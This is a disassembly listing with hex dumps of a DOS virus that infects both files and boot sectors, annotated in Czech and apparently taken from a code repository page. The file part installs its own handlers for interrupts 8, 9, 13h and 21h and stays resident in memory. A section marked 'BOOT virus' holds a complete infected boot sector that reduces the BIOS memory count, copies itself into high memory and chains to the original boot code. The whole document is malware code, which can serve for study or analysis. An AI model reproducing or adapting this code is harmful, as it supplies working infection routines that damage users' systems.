0BA5 EA20202020 JMP 2020:2020
0BAA E87DFE CALL 0A2A
0BAD E8AEFE CALL 0A5E
0BB0 33C0 XOR AX,AX
0BB2 8EC0 MOV ES,AX
0BB4 26A1F003 MOV AX,ES:[03F0]
0BB8 2EA31800 MOV CS:[0018],AX
0BBC 26A0F203 MOV AL,ES:[03F2]
0BC0 2EA21A00 MOV CS:[001A],AL
0BC4 26C706F003F3A5 MOV Word Ptr ES:[03F0],A5F3 ; 0:3F0 F3 A5 REPZ MOVSW
0BCB 26C606F203CB MOV Byte Ptr ES:[03F2],CB ; 0:3F2 CB RETF
0BD1 58 POP AX
0BD2 051000 ADD AX,0010
0BD5 8EC0 MOV ES,AX
0BD7 0E PUSH CS
0BD8 1F POP DS
0BD9 B90010 MOV CX,1000
0BDC D1E9 SHR CX,1
0BDE 33F6 XOR SI,SI
0BE0 8BFE MOV DI,SI
0BE2 06 PUSH ES
0BE3 B8EC0B MOV AX,0BEC
0BE6 50 PUSH AX
0BE7 EAF0030000 JMP 0000:03F0
AX=0BEC BX=0E1A CX=0800 DX=2D4C SP=0DEA BP=0000 SI=0000 DI=0000
DS= CS ES= CS SS= CS CS= CS IP=0BE7 NV UP EI PL ZR NA PE NC
;---------------------------------------------------------------------
0BEC 8CC8 MOV AX,CS
0BEE 8ED0 MOV SS,AX
0BF0 BCEE0D MOV SP,0DEE
0BF3 33C0 XOR AX,AX
0BF5 8ED8 MOV DS,AX
0BF7 2EA11800 MOV AX,CS:[0018]
0BFB A3F003 MOV [03F0],AX
0BFE 2EA01A00 MOV AL,CS:[001A]
0C02 A2F203 MOV [03F2],AL
0C05 BB0010 MOV BX,1000
0C08 B104 MOV CL,04
0C0A D3EB SHR BX,CL
0C0C 83C340 ADD BX,+40
0C0F B44A MOV AH,4A ; modifikuj alokovanou pamet
0C11 2E8E061600 MOV ES,CS:[0016]
0C16 CD21 INT 21
0C18 B82135 MOV AX,3521
0C1B CD21 INT 21
0C1D 2E891EC506 MOV CS:[06C5],BX
0C22 2E8C06C706 MOV CS:[06C7],ES
0C27 0E PUSH CS
0C28 1F POP DS
0C29 BA9A06 MOV DX,069A
0C2C B82125 MOV AX,2521
0C2F CD21 INT 21
0C31 8E061600 MOV ES,[0016]
0C35 268E062C00 MOV ES,ES:[002C]
0C3A 33FF XOR DI,DI
0C3C B9FF7F MOV CX,7FFF
0C3F 32C0 XOR AL,AL
0C41 F2AE REPNZ SCASB
0C43 263805 CMP ES:[DI],AL
0C46 E0F9 LOOPNZ 0C41
0C48 8BD7 MOV DX,DI
0C4A 83C203 ADD DX,+03
0C4D B8004B MOV AX,4B00
0C50 06 PUSH ES
0C51 1F POP DS
0C52 0E PUSH CS
0C53 07 POP ES
0C54 BB7000 MOV BX,0070
0C57 1E PUSH DS
0C58 06 PUSH ES
0C59 50 PUSH AX
0C5A 53 PUSH BX
0C5B 51 PUSH CX
0C5C 52 PUSH DX
0C5D 0E PUSH CS
0C5E 1F POP DS
0C5F B80835 MOV AX,3508
0C62 CD21 INT 21
0C64 891ED902 MOV [02D9],BX
0C68 8C06DB02 MOV [02DB],ES
0C6C BAB302 MOV DX,02B3
0C6F B80825 MOV AX,2508
0C72 CD21 INT 21
0C74 B80935 MOV AX,3509
0C77 CD21 INT 21
0C79 891EBA03 MOV [03BA],BX
0C7D 8C06BC03 MOV [03BC],ES
0C81 BA7303 MOV DX,0373
0C84 B80925 MOV AX,2509
0C87 CD21 INT 21
0C89 B81335 MOV AX,3513
0C8C CD21 INT 21
0C8E 891E3406 MOV [0634],BX
0C92 8C063606 MOV [0636],ES
0C96 BAF004 MOV DX,04F0
0C99 B81325 MOV AX,2513
0C9C CD21 INT 21
0C9E 5A POP DX
0C9F 59 POP CX
0CA0 5B POP BX
0CA1 58 POP AX
0CA2 07 POP ES
0CA3 1F POP DS
0CA4 9C PUSHF
0CA5 2EFF1EC506 CALL FAR CS:[06C5]
0CAA 1E PUSH DS
0CAB 07 POP ES
0CAC B449 MOV AH,49
0CAE CD21 INT 21
0CB0 B44D MOV AH,4D
0CB2 CD21 INT 21
0CB4 B431 MOV AH,31
0CB6 BA0010 MOV DX,1000
0CB9 B104 MOV CL,04
0CBB D3EA SHR DX,CL
0CBD 83C240 ADD DX,+40
0CC0 CD21 INT 21
0CC0 00 00 00 00 00 00-00 00 00 00 00 00 00 00
0CD0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
.
.
.
0DB0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
0DC0 00 00 00 00 00 00 F0 0C-FF 48 C5 48 57 18 06 00 ......p..HEHW...
0DD0 C5 48 00 00 00 00 C5 48-D5 48 00 00 EC 0B 59 09 EH....EHUH..l.Y.
0DE0 EC 0B 00 00 EC 0B 00 00-EC 0B D5 48 C0 3F 40 00 l...l...l.UH@?@.
0DF0 F5 19 73 0A F5 19 46 02-22 15 EC 0B 32 15 00 00 u.s.u.F.".l.2...
;===========================================================================
; BOOT virus
;
0000 E99C00 JMP 009F
0000 E9 9C 00 4D 53 44 4F 53-34 2E 30 00 02 01 01 00 i..MSDOS4.0.....
0010 02 E0 00 40 0B F0 09 00-12 00 02 00 00 00 00 00 .`.@.p..........
0020 00 00 00 00 00 00 29 DC-49 4F 20 20 20 20 20 20 ......)\IO
0030 53 59 53 4D 53 44 4F 53-20 20 20 53 59 53 CB 3C SYSMSDOS SYSK<
0040 FE FF FE FF 07 00 80 00-4E 6F 6E 2D 73 79 73 74 ~.~.....Non-syst
0050 65 6D 20 64 69 73 6B 20-6F 72 20 64 69 73 6B 20 em disk or disk
0060 65 72 72 6F 72 2E 0A 0D-52 65 70 6C 61 63 65 20 error...Replace
0070 61 6E 64 20 73 74 72 69-6B 65 20 61 6E 79 20 6B and strike any k
0080 65 79 20 77 68 65 6E 20-72 65 61 64 79 44 69 73 ey when readyDis
0090 6B 20 62 6F 6F 74 20 66-61 69 6C 75 72 65 2E k boot failure.
009F B8006E MOV AX,6E00
00A2 B104 MOV CL,04
00A4 D3E8 SHR AX,CL
00A6 8CC9 MOV CX,CS
00A8 03C1 ADD AX,CX
00AA 8ED8 MOV DS,AX
00AC 8EC0 MOV ES,AX
00AE 8ED1 MOV SS,CX
00B0 BCF0FF MOV SP,FFF0
00B3 1E PUSH DS
00B4 B8B90E MOV AX,0EB9
00B7 50 PUSH AX
00B8 CB RETF
;=======================================================================
; pokracovani po RETF - kod souvisly, zmena CS
;
0EB9 8816460E MOV [0E46],DL
0EBD 33C0 XOR AX,AX
0EBF 8ED8 MOV DS,AX
0EC1 A11304 MOV AX,[0413] ; velikost pameti v kB
0EC4 B106 MOV CL,06
0EC6 D3E0 SHL AX,CL
0EC8 8ED8 MOV DS,AX ; prepocet na paragrafy
0ECA 833E400EFE CMP Word Ptr [0E40],-02
0ECF 751A JNZ 0EEB
0ED1 B8520F MOV AX,0F52
0ED4 1E PUSH DS
0ED5 50 PUSH AX
0ED6 1E PUSH DS
0ED7 07 POP ES
0ED8 BF000E MOV DI,0E00
0EDB 33C0 XOR AX,AX
0EDD 8ED8 MOV DS,AX
0EDF BE007C MOV SI,7C00
0EE2 B94000 MOV CX,0040
0EE5 FA CLI
0EE6 FC CLD
0EE7 F3A4 REPZ MOVSB
0EE9 FB STI
0EEA CB RETF
0EEB 33C0 XOR AX,AX
0EED 8ED8 MOV DS,AX
0EEF A11304 MOV AX,[0413]
0EF2 2D0500 SUB AX,0005
0EF5 A31304 MOV [0413],AX
0EF8 B106 MOV CL,06
0EFA D3E0 SHL AX,CL
0EFC 8ED8 MOV DS,AX
0EFE 8EC0 MOV ES,AX
0F00 2E8B16460E MOV DX,CS:[0E46]
0F05 33DB XOR BX,BX
0F07 2E8B0E440E MOV CX,CS:[0E44]
0F0C B80802 MOV AX,0208
0F0F E8C800 CALL 0FDA
0F12 1E PUSH DS
0F13 B8180F MOV AX,0F18
0F16 50 PUSH AX
0F17 CB RETF
0F18 8816460E MOV [0E46],DL
0F1C 33C0 XOR AX,AX
0F1E 8ED8 MOV DS,AX
0F20 0E PUSH CS
0F21 07 POP ES
0F22 E839FB CALL 0A5E
0F25 2EC606740F00 MOV Byte Ptr CS:[0F74],00
0F2B 90 NOP
0F2C 8CC9 MOV CX,CS
0F2E BFD902 MOV DI,02D9 ; definice preruseni 8
0F31 BE2000 MOV SI,0020
0F34 BA750F MOV DX,0F75
0F37 E88500 CALL 0FBF
0F3A BE2400 MOV SI,0024 ; definice preruseni 9
0F3D BFBA03 MOV DI,03BA
0F40 BA7303 MOV DX,0373
0F43 E87900 CALL 0FBF
0F46 BE4C00 MOV SI,004C ; definice preruseni 13
0F49 BF3406 MOV DI,0634
0F4C BAF004 MOV DX,04F0
0F4F E86D00 CALL 0FBF
0F52 1E PUSH DS
0F53 07 POP ES
0F54 C7068400FFFF MOV Word Ptr [0084],FFFF
0F5A BB007C MOV BX,7C00
0F5D 2E8B0E440E MOV CX,CS:[0E44]
0F62 80C108 ADD CL,08
0F65 2E8B16460E MOV DX,CS:[0E46]
0F6A B80102 MOV AX,0201
0F6D E86A00 CALL 0FDA
0F70 1E PUSH DS
0F71 53 PUSH BX
0F72 CB RETF
0F73 00 01
0F75 FA CLI
0F76 2E803E740F00 CMP Byte Ptr CS:[0F74],00
0F7C 7404 JZ 0F82
0F7E E932F3 JMP 02B3
0F82 1E PUSH DS
0F83 06 PUSH ES
0F84 50 PUSH AX
0F85 53 PUSH BX
0F86 51 PUSH CX
0F87 52 PUSH DX
0F88 56 PUSH SI
0F89 57 PUSH DI
0F8A 33C0 XOR AX,AX
0F8C 8ED8 MOV DS,AX
0F8E A18400 MOV AX,[0084]
0F91 3DFFFF CMP AX,FFFF
0F94 741E JZ 0FB4
0F96 2E8006730F02 ADD Byte Ptr CS:[0F73],02
0F9C 7316 JNB 0FB4
0F9E 2EC606740F01 MOV Byte Ptr CS:[0F74],01
0FA4 0E PUSH CS
0FA5 07 POP ES
0FA6 BE8400 MOV SI,0084
0FA9 BFC506 MOV DI,06C5
0FAC 8CC9 MOV CX,CS
0FAE BA9A06 MOV DX,069A
0FB1 E80B00 CALL 0FBF
0FB4 5F POP DI
0FB5 5E POP SI
0FB6 5A POP DX
0FB7 59 POP CX
0FB8 5B POP BX
0FB9 58 POP AX
0FBA 07 POP ES
0FBB 1F POP DS
0FBC E919F3 JMP 02D8
0FBF 1E PUSH DS
0FC0 50 PUSH AX
0FC1 33C0 XOR AX,AX
0FC3 8ED8 MOV DS,AX
0FC5 58 POP AX
0FC6 51 PUSH CX
0FC7 FC CLD
0FC8 B90200 MOV CX,0002
0FCB F3A5 REPZ MOVSW
0FCD 59 POP CX
0FCE 83EE04 SUB SI,+04
0FD1 FA CLI
0FD2 8914 MOV [SI],DX
0FD4 894C02 MOV [SI+02],CX
0FD7 FB STI
0FD8 1F POP DS
0FD9 C3 RET
0FDA 56 PUSH SI
0FDB 8BF0 MOV SI,AX
0FDD CD13 INT 13
0FDF 7308 JNB 0FE9
0FE1 B400 MOV AH,00
0FE3 CD13 INT 13
0FE5 8BC6 MOV AX,SI
0FE7 EBF4 JMP 0FDD
0FE9 5E POP SI
0FEA C3 RET
0FE0 08 B4 00 CD 13 8B C6 EB-F4 5E C3 00 00 00 00 00 .4.M..Fkt^C.....
0FF0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 55 AA ..............U*

Reference in New Issue View Git Blame Copy Permalink